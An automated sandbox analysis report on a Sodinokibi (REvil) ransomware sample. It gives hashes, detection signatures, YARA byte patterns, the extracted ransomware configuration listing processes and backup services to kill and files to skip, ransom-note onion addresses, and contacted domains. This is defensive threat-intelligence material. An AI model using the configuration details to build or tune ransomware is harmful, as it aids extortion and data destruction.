Analysis Report tS9P6wPz9x

Overview

General Information

Sample Name: tS9P6wPz9x (renamed file extension from none to exe)
Analysis ID: 353325
MD5: 39d22b8f3da4a83cd957f324f2423309
SHA1: 70baae39f80e8917a71353110bb85e797e23524a
SHA256: c8c169ad2628ff3860c4d0bd04afeb81262051f664f9d5a334c32c78e791a7f8

Detection

Sodinokibi
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Found ransom note / readme
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Sodinokibi Ransomware
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Found Tor onion address
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for sample
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Connects to many different domains
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to delete services
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara signature match

Startup

  • System is w10x64
  • tS9P6wPz9x.exe (PID: 2844 cmdline: 'C:\Users\user\Desktop\tS9P6wPz9x.exe' MD5: 39D22B8F3DA4A83CD957F324F2423309)
  • unsecapp.exe (PID: 6192 cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding MD5: 9CBD3EC8D9E4F8CE54258B0573C66BEB)
  • cleanup

Malware Configuration

Threatname: Sodinokibi

{"prc": ["dbsnmp", "excel", "ocssd", "outlook", "sql", "mydesktopqos", "infopath", "thunderbird", "synctime", "ocomm", "wordpad", "sqbcoreservice", "encsvc", "msaccess", "agntsvc", "mydesktopservice", "xfssvccon", "powerpnt", "isqlplussvc", "winword", "onenote", "firefox", "thebat", "dbeng50", "tbirdconfig", "visio", "mspub", "steam", "oracle", "ocautoupds"], "sub": "6815", "svc": ["mepocs", "sophos", "backup", "veeam", "sql", "svc$", "memtas", "vss"], "wht": {"ext": ["com", "386", "ldf", "cur", "deskthemepack", "spl", "ocx", "cpl", "prf", "icl", "scr", "msi", "msu", "msp", "ico", "drv", "ps1", "ics", "bat", "exe", "diagpkg", "themepack", "nomedia", "rtp", "msstyles", "msc", "hlp", "key", "adv", "dll", "theme", "lock", "diagcab", "sys", "icns", "nls", "diagcfg", "cmd", "hta", "mpa", "mod", "lnk", "bin", "idx", "cab", "rom", "wpx", "shs", "ani"], "fls": ["boot.ini", "bootfont.bin", "ntuser.dat", "desktop.ini", "bootsect.bak", "iconcache.db", "ntuser.ini", "ntldr", "thumbs.db", "ntuser.dat.log", "autorun.inf"], "fld": ["windows.old", "boot", "$recycle.bin", "program files (x86)", "mozilla", "programdata", "appdata", "google", "tor browser", "perflogs", "intel", "$windows.~bt", "msocache", "application data", "program files", "$windows.~ws", "system volume information", "windows"]}, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA", "dmn": "[domain list omitted]", "dbg": false, "pid": "$2a$10$sYj.VWTKCY5QkbqRNRCogemc/JqEL1sMmXrIjgYNnJIardparjHz.", "nbody": "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", "et": 0, "wipe": true, "wfld": ["backup"], "rdmcnt": 0, "nname": "{EXT}-readme.txt", "pk": "FDtJqlbkMA5DjrKi/sH653OY4J4hBtpB+JyN0FRpo3U=", "net": true, "exp": false, "arn": false}

Yara Overview

Initial Sample

Source: tS9P6wPz9x.exe, Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Author: Florian Roth, Strings:
  • 0x4cee:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x9a4e:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0xa03a:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x9273:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x9a3d:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F

Memory Dumps

Source: 00000000.00000003.204386386.0000000002DB9000.00000004.00000040.sdmp, Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Author: Joe Security
Source: 00000000.00000003.204547357.0000000002DB9000.00000004.00000040.sdmp, Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Author: Joe Security
Source: 00000000.00000000.203907016.00000000009C1000.00000020.00020000.sdmp, Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Author: Florian Roth, Strings:
  • 0x48ee:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x964e:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0x9c3a:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x8e73:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x963d:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F
Source: 00000000.00000003.204201424.0000000002DB9000.00000004.00000040.sdmp, Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Author: Joe Security
Source: 00000000.00000003.204266101.0000000002DB9000.00000004.00000040.sdmp, Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Author: Joe Security

Unpacked PEs

Source: 0.2.tS9P6wPz9x.exe.9c0000.1.unpack, Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Author: Florian Roth, Strings:
  • 0x4cee:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x9a4e:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0xa03a:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x9273:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x9a3d:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F
Source: 0.0.tS9P6wPz9x.exe.9c0000.0.unpack, Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Author: Florian Roth, Strings:
  • 0x4cee:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x9a4e:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0xa03a:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x9273:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x9a3d:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: tS9P6wPz9x.exe, Avira: detected
Found malware configuration
Source: tS9P6wPz9x.exe.2844.0.memstr, Malware Configuration Extractor: Sodinokibi
          Multi AV Scanner detection for domain / URL
          Source: 365questions.org | Virustotal: Detection: 6%
          Multi AV Scanner detection for submitted file
          Source: tS9P6wPz9x.exe | Virustotal: Detection: 75%
          Machine Learning detection for sample
          Source: tS9P6wPz9x.exe | Joe Sandbox ML: detected
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | Code function: 0_2_009C5CDE CryptStringToBinaryW,CryptStringToBinaryW,0_2_009C5CDE
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | Code function: 0_2_009C541B CryptAcquireContextW,CryptGenRandom,0_2_009C541B
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | Code function: 0_2_009C5D3F CryptBinaryToStringW,CryptBinaryToStringW,0_2_009C5D3F

          Compliance:

          Uses 32bit PE files
          Source: tS9P6wPz9x.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Creates license or readme file
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | File created: C:\4wfaj7427w-readme.txt
          Uses secure TLS version for HTTPS connections
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | File opened (one entry per drive): z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | Code function: 0_2_009C761A FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_009C761A
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\NULL
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\manifest.json
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specific
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specific\win_x64
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specific\NULL
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe | File opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\LICENSE

          Networking:

          Found Tor onion address
          Source: tS9P6wPz9x.exe, 00000000.00000003.204300775.0000000002DF5000.00000004.00000040.sdmp | String found in binary or memory: http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/
          Source: tS9P6wPz9x.exe, 00000000.00000003.204300775.0000000002DF5000.00000004.00000040.sdmp | String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
          Source: tS9P6wPz9x.exe, 00000000.00000003.364421083.0000000002DF0000.00000004.00000040.sdmp | String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/05EE5FC73EB66605
          Source: 4wfaj7427w-readme.txt.0.dr | String found in binary or memory: http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/
          Source: 4wfaj7427w-readme.txt.0.dr | String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/05EE5FC73EB66605
          Source: unknown | Network traffic detected: DNS query count 46
          Source: unknown | Network traffic detected: IP country count 13
          Source: Joe Sandbox View | IP Address: 136.243.147.81
          Source: Joe Sandbox View | IP Address: 184.168.131.241
          Source: Joe Sandbox View | ASN Name: SIMPLYTRANSITGB
          Source: Joe Sandbox View | ASN Name: REGISTER_UK-ASGB
          Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
          Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: unknown | DNS traffic detected: queries for: asgestion.com
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: https://certs.starfieldtY9R
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: https://certs.starfieldtech.com/repository/0
          Source: tS9P6wPz9x.exe, 00000000.00000003.533241518.0000000000C0B000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://conexa4papers.trade/data/pictures/ku.gif
          Source: tS9P6wPz9x.exe, 00000000.00000003.533241518.0000000000C0B000.00000004.00000001.sdmpString found in binary or memory: https://conexa4papers.trade/data/pictures/ku.gifC
          Source: tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://conexa4papers.trade:443/data/pictures/ku.gifpsvmkrt.pngmediaacademy-iraq.orgmediaacademy-ira
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.515240536.00000000038F6000.00000004.00000001.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/analyticsjs/
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/wp-
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/wp-content/plugins/bst-dsgvo-cookie/includes/css/bst-mesage.css?ver=5.6.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/wp-content/plugins/bst-dsgvo-cookie/includes/css/style.css?ver=5.6.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/wp-includes/css/dist/block-library/style.min.css?ver=5.6.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.468482047.0000000000BC0000.00000004.00000001.sdmpString found in binary or memory: https://dontpassthepepper.com/1
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://dontpassthepepper.com/wp-content/tmp/mitn.jpgt
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://dontpassthepepper.com:443/wp-content/tmp/mitn.jpgo
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Lato:100
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: tS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Oswald
          Source: tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
          Source: tS9P6wPz9x.exe, 00000000.00000003.474321416.00000000038CA000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Ubuntu
          Source: tS9P6wPz9x.exe, 00000000.00000003.474321416.00000000038CA000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Ubuntu:400
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/anticslab/v9/bWt97fPFfRzkCa9Jlp6IacVcWkxq9Qs.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizYRExUiTo99u79D0e0w8mOAjcQ-woy.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizYRExUiTo99u79D0e0x8mOAjcQ-w.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizYRExUiTo99u79D0e0ycmOAjcQ-woy.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizYRExUiTo99u79D0e0ysmOAjcQ-woy.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizaRExUiTo99u79D0-Ew8OPIDUg-g.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizdRExUiTo99u79D0e8fOydIRUb0TA7i2bI.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizdRExUiTo99u79D0e8fOydIhUb0TA7i2bI.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizdRExUiTo99u79D0e8fOydKxUb0TA7i2bI.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizdRExUiTo99u79D0e8fOydLxUb0TA7iw.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: https://gemeentehetkompas.nl/
          Source: tS9P6wPz9x.exe, 00000000.00000003.532818048.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://gemeentehetkompas.nl/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://gmpg.org/xfn/11
          Source: tS9P6wPz9x.exe, 00000000.00000002.602165365.0000000002E15000.00000004.00000040.sdmpString found in binary or memory: https://havecamerawilltravel2017.wordpress.com/include/assets/afgilbpg.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.537209069.0000000000C0E000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/#website
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/comments/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/include/pics/ejtmxcqjwhdy.gif
          Source: tS9P6wPz9x.exe, 00000000.00000003.537209069.0000000000C0E000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/l
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/wp-content/plugins/google-a
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/wp-content/plugins/google-analytics-dashboard-for-wp/assets/css/fro
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/wp-content/plugins/tablepress/css/default.min.css?ver=1.12
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/wp-content/themes/rainforest/style.css?ver=5.6.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/wp-includes/css/di
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de:443/include/pics/ejtmxcqjwhdy.gif
          Source: tS9P6wPz9x.exe, 00000000.00000003.537209069.0000000000C0E000.00000004.00000001.sdmpString found in binary or memory: https://humancondition.com/include/assets/fkyihxilog.gif
          Source: tS9P6wPz9x.exe, 00000000.00000002.596864356.0000000000B4A000.00000004.00000020.sdmpString found in binary or memory: https://idemblogs.com/
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: https://idemblogs.com/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: https://idemblogs.com:443/uploads/image/aeun.jpgwww.kmbshipping.co.ukwww.kmbshipping.co.ukW
          Source: tS9P6wPz9x.exe, 00000000.00000003.515334796.0000000000BFD000.00000004.00000001.sdmpString found in binary or memory: https://ikads.org/admin/graphic/fnblbl.gif
          Source: tS9P6wPz9x.exe, 00000000.00000003.515334796.0000000000BFD000.00000004.00000001.sdmpString found in binary or memory: https://ikads.org/admin/graphic/fnblbl.gifC
          Source: tS9P6wPz9x.exe, 00000000.00000003.517413012.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://ikads.org/gF
          Source: tS9P6wPz9x.exe, 00000000.00000003.515334796.0000000000BFD000.00000004.00000001.sdmpString found in binary or memory: https://ikads.org:443/admin/graphic/fnblbl.gifn.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://issuu.com/theintermediagroup/docs/spa___clinic_volume_83
          Source: tS9P6wPz9x.exe, 00000000.00000002.597178188.0000000000B7E000.00000004.00000020.sdmp, tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: https://kmbshipping.co.uk/admin/pics/xukxqlujcu.gif
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://kreaturamedia.com/layerslider-responsive-wordpress-slider-plugin/
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://latribuessentielle.com/
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://latribuessentielle.com/#website
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://latribuessentielle.com/?s=
          Source: tS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: https://latribuessentielle.com/admin/assets/gzpcgard.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://latribuessentielle.com/comments/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://latribuessentielle.com/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://latribuessentielle.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://latribuessentielle.com/wp-content/plugins/salient-social/css/style.css?ver=1.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://latribuessentielle.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://latribuessentielle.com/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://mailchi.mp/1cfeb1a8f2e4/this-offer-is-lit-30-off-when-your-a-luxe-vip-member
          Source: tS9P6wPz9x.exe, 00000000.00000003.517436386.0000000000BFD000.00000004.00000001.sdmpString found in binary or memory: https://manifestinglab.com/
          Source: tS9P6wPz9x.exe, 00000000.00000003.517436386.0000000000BFD000.00000004.00000001.sdmpString found in binary or memory: https://manifestinglab.com/news/tmp/pakc.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.517436386.0000000000BFD000.00000004.00000001.sdmpString found in binary or memory: https://manifestinglab.com/news/tmp/pakc.jpgC
          Source: tS9P6wPz9x.exe, 00000000.00000003.517436386.0000000000BFD000.00000004.00000001.sdmpString found in binary or memory: https://manifestinglab.com:443/news/tmp/pakc.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://mediaacademy-iraq.org/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://menexa4papers.trade/
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com/
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com/#website
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com/?s=
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com/comments/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com/uploads/image/burgajaobu.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.468434175.0000000000B89000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com/uploads/image/burgajaobu.pngif
          Source: tS9P6wPz9x.exe, 00000000.00000003.468434175.0000000000B89000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com/uploads/image/burgajaobu.pngifh
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com/xmlrpc.php
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://narcert.com:443/uploads/image/burgajaobu.png
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: https://nsec.se/
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: https://nsec.se/R
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: https://nsec.se/data/image/od.png
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: https://nsec.se:443/data/image/od.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.459057587.0000000000C10000.00000004.00000001.sdmpString found in binary or memory: https://ogp.me/ns#
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://open.spotify.com/episode/2z7qIfZlCzb04pemsS18kR
